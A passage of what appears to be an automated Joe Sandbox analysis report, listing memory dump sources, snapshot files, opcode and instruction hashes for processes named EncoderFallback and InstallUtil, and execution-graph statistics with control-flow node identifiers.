                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2755bc2bf35f6821919bb58ad6496060941988340d362a0f27ed415452a1e07f
                                                                                          • Instruction ID: bb6b2dd5fed75debfb17466bd79876514ceaec96d4da15e579f7bcae906245d7
                                                                                          • Opcode Fuzzy Hash: 2755bc2bf35f6821919bb58ad6496060941988340d362a0f27ed415452a1e07f
                                                                                          • Instruction Fuzzy Hash: 871146B4D1021ACFDF04CFA9D8456EEBBFAFB88310F11802AD514B3200D7745A89CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2752439514.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_ebd000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction ID: c2afc7f7843783a4ef0805b5b7ce78b3795d6e8ca5e190bc1652b101fd66e9ac
                                                                                          • Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
                                                                                          • Instruction Fuzzy Hash: 33112672504280DFCB12CF10D9C0B56BF71FB84328F24C6A9D8090B256C33AD85ACBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20833a4423aa1b6fdd0b21a2a710f07237709233f3faa546e22596d8bfdb293a
                                                                                          • Instruction ID: fceba6b7916130e3533683e651401ae856cb3a6b9bd779567fef9c72c94d0493
                                                                                          • Opcode Fuzzy Hash: 20833a4423aa1b6fdd0b21a2a710f07237709233f3faa546e22596d8bfdb293a
                                                                                          • Instruction Fuzzy Hash: C921E574A44229CFDF60CF24CD80BEAB7B6BB49308F1080EAA849A3241D7719A85CF10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 79843937387f8eb9181ce9edd6b243b73b0ffa24726fdea5557a1105f1171388
                                                                                          • Instruction ID: 43cd02484843b4ed2599839ec8e7a4d831a7530b4a1a1f03d3a4f08223db6edc
                                                                                          • Opcode Fuzzy Hash: 79843937387f8eb9181ce9edd6b243b73b0ffa24726fdea5557a1105f1171388
                                                                                          • Instruction Fuzzy Hash: 1321E4B8A01229CFDB69DF28CA88AD9B7F5FB49304F1195E9D818A7745D7309EC18F00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 21ea519429d690c18f48b441f8b1eb8657db299416b5296e7202f4c9881b5462
                                                                                          • Instruction ID: 52849926e9bed227aece13c72ee53c60bb532414121c5b1de31a8e32e8f3ccff
                                                                                          • Instruction Fuzzy Hash: 93F08C35508208EBEB05DF94E940EADBFBABB06300F10C099ED4553291C7328962EB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 423b4b770d33551ee594573b2e1d47d9e1b09c384a9d233310865970ce4a1536
                                                                                          • Instruction ID: 3f078522e4b327c0bb2d678dface340875819ee3f74586f1646eaed700f41bdf
                                                                                          • Opcode Fuzzy Hash: 423b4b770d33551ee594573b2e1d47d9e1b09c384a9d233310865970ce4a1536
                                                                                          • Instruction Fuzzy Hash: C8F03075808208ABD718DBD4D905BACBFB4EB44314F14C1AAD85466741D6799A52DB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 23c950fcc41f6aac2225c0596920f3167025c3048df9e50a8e7fabfc0b5918c9
                                                                                          • Instruction ID: 31ad0853cbea39980e77f49e38ace8345082909e57d29bcffa04617735d150b3
                                                                                          • Opcode Fuzzy Hash: 23c950fcc41f6aac2225c0596920f3167025c3048df9e50a8e7fabfc0b5918c9
                                                                                          • Instruction Fuzzy Hash: 01F0E53640410CFBDB14CF94E900AACBF76FB09314F208099FC0457391C7328961EB40
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 31e63b122d669eeb758e329f870b532a94ce21a9610da6e2d0cf10a5d78eff69
                                                                                          • Instruction ID: 3ec8d24305ce86a05b96e6ede8c28af880a786eec2dc6c73fd38fed2686dfa41
                                                                                          • Opcode Fuzzy Hash: 31e63b122d669eeb758e329f870b532a94ce21a9610da6e2d0cf10a5d78eff69
                                                                                          • Instruction Fuzzy Hash: 5AE022B180D3489FDB04DFE4C81052CBFB4AB12214F1442DEC898573D2CA31CE02C781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8f7f94175911151541d3e2c97bbbba67802a1287139b84e85dc256c6d56fc1e8
                                                                                          • Instruction ID: 257f86285067f0685c2a9284a8cbd8bd092a85a33ffaaa30b7a05778446ae316
                                                                                          • Opcode Fuzzy Hash: 8f7f94175911151541d3e2c97bbbba67802a1287139b84e85dc256c6d56fc1e8
                                                                                          • Instruction Fuzzy Hash: 46F0A030909288EFD714DBD8D5416ACBFB5EB49300F10C0EADC4553381CA358A42EB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eb8cb71a8aa4d97167c42d1e2042f8fb1a21bb0a8f74d0937a34cca8c503e96e
                                                                                          • Instruction ID: fb2960e310f10cde713936481b2f837917fdb188d86a03b33e41c3059b102c80
                                                                                          • Opcode Fuzzy Hash: eb8cb71a8aa4d97167c42d1e2042f8fb1a21bb0a8f74d0937a34cca8c503e96e
                                                                                          • Instruction Fuzzy Hash: 3DF01DB4A001148FDB55DF68D989A8A77F6FB89314F1091D5E419B7384CB309E94CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 265752226a87fc839d74572850075d517e951407b2666fefaeabe5e2032f470a
                                                                                          • Instruction ID: 06e477389200101353812a401fbcd0dc48cc143019edd944949768f5d6253ac9
                                                                                          • Opcode Fuzzy Hash: 265752226a87fc839d74572850075d517e951407b2666fefaeabe5e2032f470a
                                                                                          • Instruction Fuzzy Hash: 78E0927480A218ABD714DBA4E90996DBFB9AB55304F2090EBCC5417382D6319D46CB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2f9ea2ed7e41b0889f8e0a36a5131b362254e1e0127563eaefcc21e32aa4e48
                                                                                          • Instruction ID: ea38b159fa563f0c387641be25c36da72872c7ead2014e0d9f1fc58c09d9b1d6
                                                                                          • Opcode Fuzzy Hash: a2f9ea2ed7e41b0889f8e0a36a5131b362254e1e0127563eaefcc21e32aa4e48
                                                                                          • Instruction Fuzzy Hash: 02E0D871C08208ABE724CBE8D9009ACBFB4EB55324F2081EAC809573C1D6319D47C742
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bc5e96ecd31a4016c5b27b70bf08b9ba6678d6eba9a1b35e82ffe0b52c508d7c
                                                                                          • Instruction ID: e287374ae64dbaff8b45f665ad46c5beca6e8ba2f9221ab8e3ffc55fb3202762
                                                                                          • Opcode Fuzzy Hash: bc5e96ecd31a4016c5b27b70bf08b9ba6678d6eba9a1b35e82ffe0b52c508d7c
                                                                                          • Instruction Fuzzy Hash: 84F0F274D0420CAFDB84DFA8C540A9CBFF4EB88300F10C0AAD81893340D6319A52DB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac8ef3f025b092e33ad577bd0710559ed2a909ff148128a3e0d9348770f3b5e0
                                                                                          • Instruction ID: 1fb072fc17564137bcdb726cbe9eccb57f665838c052a0d77e6456d210529724
                                                                                          • Opcode Fuzzy Hash: ac8ef3f025b092e33ad577bd0710559ed2a909ff148128a3e0d9348770f3b5e0
                                                                                          • Instruction Fuzzy Hash: D8F03935804218EFDB04CF94C900AACBFB9FB48310F14C0AAEC6866351D6329A52EB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: baa8c49d020fd67a69de163621a4d7753089d8604fb9f37e8d32919635baa209
                                                                                          • Instruction ID: 456674b3d935a8aafc6cbb64fa8ffcc268c78b36a2b1388c943cbd0952771a26
                                                                                          • Opcode Fuzzy Hash: baa8c49d020fd67a69de163621a4d7753089d8604fb9f37e8d32919635baa209
                                                                                          • Instruction Fuzzy Hash: 22E03939805108EBDB05CF94D9009ADBFB5FB48300F108099ED0416291C6329A62EB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe6fee597c4041949f1987c9ddcd5c29ca50ea2dc85f78bb95db11d8a6bb8c04
                                                                                          • Instruction ID: e3df2e140729b8bec003862c6a0db6cf233c89b9424a760d14f42fa5587fae5a
                                                                                          • Opcode Fuzzy Hash: fe6fee597c4041949f1987c9ddcd5c29ca50ea2dc85f78bb95db11d8a6bb8c04
                                                                                          • Instruction Fuzzy Hash: 64E086B280110CEFE754EFF4D90179E7BF9DB45214F1004F6D00597250EA3189509BD6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774733132.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: baa8c49d020fd67a69de163621a4d7753089d8604fb9f37e8d32919635baa209
                                                                                          • Instruction ID: ea9075a6a1ce0b7e74c488e2f4c89558b5482ab34dcd2e97f22474ad2bf89ba3
                                                                                          • Opcode Fuzzy Hash: baa8c49d020fd67a69de163621a4d7753089d8604fb9f37e8d32919635baa209
                                                                                          • Instruction Fuzzy Hash: A3E06D3980410CEBCB14CF94D9009ADBFB9FB48304F108099EC0417351C7329A62EB80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: 43a92de73659a14b923dda51a447bdac55cd7447edd7a99372dca7db332351fb
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: 82E0C9B4D05208EFDB54DFA8D54069CBBF8EB48310F10C1A9D81993381D6329A62DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: dae2a5216cf0a00bf0619a84b8f1b8cb1180d1346dfb519373a2d0cea36c827e
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: 28E0C9B4D05208EFDB54DFA8D54069CFBF8EB48310F10C0E9D81993341D6319A52DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: 0d9b179ab875d5eefd57d296512e2bd935383999bafa6bfec5a67f8b7bc1ea45
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: E6E0C9B5E04208EFDB54DFA8D54169CBBF8EB49310F10C0A9D81893341D6359A52DF80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction ID: b71587ba4108da3262809cf8c24612889f4dee14118cabd809767f74b12a0e22
                                                                                          • Opcode Fuzzy Hash: fe97dc8b30ee743e993328614ae6d66bc99f48a45c6f83481afb8512644cf0c9
                                                                                          • Instruction Fuzzy Hash: 5CE0C9B4D04208EFEB54DFE8D54169CBBF8EB48310F10C1A9D81893341D6329A52DF80
                                                                                          Memory Dump Source
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d20000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8161588c73e3a497ab00f2b5126de1a0297d0c1abfee13013549f730440930da
                                                                                          • Instruction ID: f2a5fc17235994845a1616f89426e9894c2d5ec2026c58f02532c37b9f1d959e
                                                                                          • Opcode Fuzzy Hash: 8161588c73e3a497ab00f2b5126de1a0297d0c1abfee13013549f730440930da
                                                                                          • Instruction Fuzzy Hash: B2D01238604008EBCB00CE40D850C69B772EF95314B10C18AAC4917341C733DE13EA80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2778438306.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7380000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32e00506294160712f557471299414c1c3088546860f9f7773b07f13b10c34f4
                                                                                          • Instruction ID: 6afd4798fefb7950de485733b1cefa7eee1b2ef0784adfeb6a351e843327204d
                                                                                          • Opcode Fuzzy Hash: 32e00506294160712f557471299414c1c3088546860f9f7773b07f13b10c34f4
                                                                                          • Instruction Fuzzy Hash: 82C08CF208A30986F628628463083303ADCA302A0AF0018A0851D004928AB08080C253
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2753371991.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_1230000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e12d637fca2ce080465741e72b1e7eaacbb7512dda4ddac74206b49540426c2
                                                                                          • Instruction ID: 5182e8151fc92409d4859bec81c83964b74a8c63cf19ad961906fdeaecadc3e1
                                                                                          • Opcode Fuzzy Hash: 6e12d637fca2ce080465741e72b1e7eaacbb7512dda4ddac74206b49540426c2
                                                                                          • Instruction Fuzzy Hash: 7EC08CB1000348CBF2A83BF8AA0D7283FEC6B00203F0000E0D36C900D1ABB040A0D7A6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 302d1665e6255cb8403d47c371f61eea2f811810ca1edfd0c1d95c7f39b2f7ae
                                                                                          • Instruction ID: d014a3cc7bf788580037065ec75bc18aadd73a8286ac7a460f468236a51604bb
                                                                                          • Opcode Fuzzy Hash: 302d1665e6255cb8403d47c371f61eea2f811810ca1edfd0c1d95c7f39b2f7ae
                                                                                          • Instruction Fuzzy Hash: C8911470A04218CFDB54DFA8DA49BADBBF2FB4A314F20906AD489B7755DB349985CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5a761546980a43bdb58b12c29f6ebb9aeefc5fc9059bcba68660da95aebd5955
                                                                                          • Instruction ID: 1081289142c0c6adbd3da95b4e439307c4a802c87279a3e694f8cb16095509f9
                                                                                          • Opcode Fuzzy Hash: 5a761546980a43bdb58b12c29f6ebb9aeefc5fc9059bcba68660da95aebd5955
                                                                                          • Instruction Fuzzy Hash: 74911370A04218CFDB54DFA8DA49BADBBF2FB4A314F20906AD489B7755DB349985CF00
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.2774786006.0000000005D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_5d30000_EncoderFallback.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0752569eb7b53ac539ef01730d989bf455b584eb31f30b55a62b0fa95301d2e3
                                                                                          • Instruction ID: 2f55bdd3a2d6d5e9c2e40edb1f6cf6aa1dc1efb7850763f3e8ec6fb1c26cb89a
                                                                                          • Opcode Fuzzy Hash: 0752569eb7b53ac539ef01730d989bf455b584eb31f30b55a62b0fa95301d2e3
                                                                                          • Instruction Fuzzy Hash: DD911370E04218CFDB54DFA9DA45BADBBF2FB4A314F20906AD089A7759DB349885CF00

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.3%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:52
                                                                                          Total number of Limit Nodes:6

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1078 62ce888-62ce8a3 1079 62ce8cd-62ce8ec call 62cce44 1078->1079 1080 62ce8a5-62ce8cc call 62cce38 1078->1080 1086 62ce8ee-62ce8f1 1079->1086 1087 62ce8f2-62ce951 1079->1087 1094 62ce957-62ce9e4 GlobalMemoryStatusEx 1087->1094 1095 62ce953-62ce956 1087->1095 1099 62ce9ed-62cea15 1094->1099 1100 62ce9e6-62ce9ec 1094->1100 1100->1099
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3540099393.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_62c0000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1103 62ce970-62ce9ae 1104 62ce9b6-62ce9e4 GlobalMemoryStatusEx 1103->1104 1105 62ce9ed-62cea15 1104->1105 1106 62ce9e6-62ce9ec 1104->1106 1106->1105
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 062CE9D7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3540099393.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_62c0000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 82b64dc57f113309f1b4f2acc47ecc52e2a36c508980fca9292db717c8437859
                                                                                          • Instruction ID: 2ac1833d3b4639b99740d72305ed23394ef4630b3e6b969521749628e286f991
                                                                                          • Opcode Fuzzy Hash: 82b64dc57f113309f1b4f2acc47ecc52e2a36c508980fca9292db717c8437859
                                                                                          • Instruction Fuzzy Hash: CE225E34704202DBDB15AB3CE4642AD37A3EBCA3A4B20496DE406CB395DF35ED46D791

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e203278c065317253fb5a5bac28612d7d4a0c34c84aa194398e7360e32ea070
                                                                                          • Instruction ID: 0fd59cab5cb395ca9889f8446ac22f6ee7053a7041d1212aba0686a4e839a389
                                                                                          • Opcode Fuzzy Hash: 8e203278c065317253fb5a5bac28612d7d4a0c34c84aa194398e7360e32ea070
                                                                                          • Instruction Fuzzy Hash: 48E1A134B00205CFDB14DF68E894AADB7B2EF89310F25846AE50ADB355DB31ED42DB52
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 71b4e9bea81f30b932ecf5bcfa916bb8f049a48b333b863cafda96e426aceb86
                                                                                          • Instruction ID: 0a8bb5d2d572fa3eb897faaa231cb37ea7efea33187a721a61c10068ef09b1ea
                                                                                          • Opcode Fuzzy Hash: 71b4e9bea81f30b932ecf5bcfa916bb8f049a48b333b863cafda96e426aceb86
                                                                                          • Instruction Fuzzy Hash: 2DB13C70E00259CFDB10CFA9D88579DBBF1BF48714F14C12AE819E7294EB74A845EB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 89e48781af73a4cf8dae2fb2a9cdc0bf2841577f1f7967e3b00b3aa88e47b85d
                                                                                          • Instruction ID: 6ce3a9e88cfa67dd650ed05a28fcf9eea8a785500f8538563854987500fcd8ca
                                                                                          • Opcode Fuzzy Hash: 89e48781af73a4cf8dae2fb2a9cdc0bf2841577f1f7967e3b00b3aa88e47b85d
                                                                                          • Instruction Fuzzy Hash: FBA15E70E00219CFDB10CFA8D89579DBBF1BF88714F24C52AD858E7294EB74A845DB92
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 50e317534738de85b2e765dd7e060527bab378c709367da8223d64d32c15e1ab
                                                                                          • Instruction ID: c1a0918927f6f450fbf86a8d41db830d58c2a5363342189d11908be8d086d4ae
                                                                                          • Opcode Fuzzy Hash: 50e317534738de85b2e765dd7e060527bab378c709367da8223d64d32c15e1ab
